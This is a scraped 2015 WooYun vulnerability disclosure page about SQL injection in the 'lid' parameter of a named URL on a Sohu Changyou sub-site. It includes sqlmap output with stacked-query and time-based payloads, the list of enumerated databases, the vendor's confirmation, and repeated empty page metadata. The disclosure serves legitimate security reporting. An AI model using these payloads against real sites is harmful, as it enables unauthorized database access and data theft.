搜狐畅游某分站SQL注入一枚 | wooyun-2015-0131025| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131025

漏洞标题：搜狐畅游某分站SQL注入一枚

漏洞作者： null_z

提交时间：2015-08-02 10:55

修复时间：2015-09-17 13:02

公开时间：2015-09-17 13:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-02：细节已通知厂商并且等待厂商处理中
2015-08-03：厂商已经确认，细节仅向厂商公开
2015-08-13：细节向核心白帽子及相关领域专家公开
2015-08-23：细节向普通白帽子公开
2015-09-02：细节向实习白帽子公开
2015-09-17：细节向公众公开

简要描述：

SQL注入

详细说明：

注入点 http://shop.pcjoy.cn/gamedetails.aspx?lid=10007&tid=1&sid=136
注入参数lid
十二个数据库，感觉挺多数据的

漏洞证明：

sqlmap identified the following injection points with a total of 78 HTTP(s) requests:
---
Parameter: lid (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: lid=10007'; IF(2754=2754) SELECT 2754 ELSE DROP FUNCTION ONwh--&tid=1&sid=136
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: lid=10007'; WAITFOR DELAY '0:0:5'--&tid=1&sid=136
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: lid=10007' WAITFOR DELAY '0:0:5'--&tid=1&sid=136
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: lid (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: lid=10007'; IF(2754=2754) SELECT 2754 ELSE DROP FUNCTION ONwh--&tid=1&sid=136
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: lid=10007'; WAITFOR DELAY '0:0:5'--&tid=1&sid=136
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: lid=10007' WAITFOR DELAY '0:0:5'--&tid=1&sid=136
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] BBSBox
[*] CustomerService
[*] joyaccount
[*] joyshop
[*] master
[*] model
[*] msdb
[*] PayMoney
[*] PostBars
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

修复方案：

intval

版权声明：转载请注明来源 null_z@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-08-03 13:02

厂商回复：

确认漏洞存在，非常感谢白帽子提交。我们正在修复中。

漏洞评价：

2015-08-02 11:01 | M-7N10 ( 路人 | Rank:13 漏洞数:1 | 来学习的。)

前排围观
2015-08-03 13:32 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:373 | 某安全公司招聘系统运维、渗透测试、安全运...)

我也来围观下
2015-09-17 13:15 | 梨花带雨 ( 普通白帽子 | Rank:112 漏洞数:12 | 去年今日此门中，人面桃花相映红。人面不...)

@0x 80 前排挤满了只能围观你
2015-09-17 15:31 | Sky、King ( 路人 | Rank:2 漏洞数:1 | 偶尔当别人的配角、并不会让你的人生少一角)

围观前排座位

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131025

漏洞标题：搜狐畅游某分站SQL注入一枚

相关厂商：搜狐畅游

漏洞作者： null_z

提交时间：2015-08-02 10:55

修复时间：2015-09-17 13:02

公开时间：2015-09-17 13:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 null_z@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131025

漏洞标题：搜狐畅游某分站SQL注入一枚

相关厂商：搜狐畅游

漏洞作者： null_z

提交时间：2015-08-02 10:55

修复时间：2015-09-17 13:02

公开时间：2015-09-17 13:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0131025"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 null_z@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：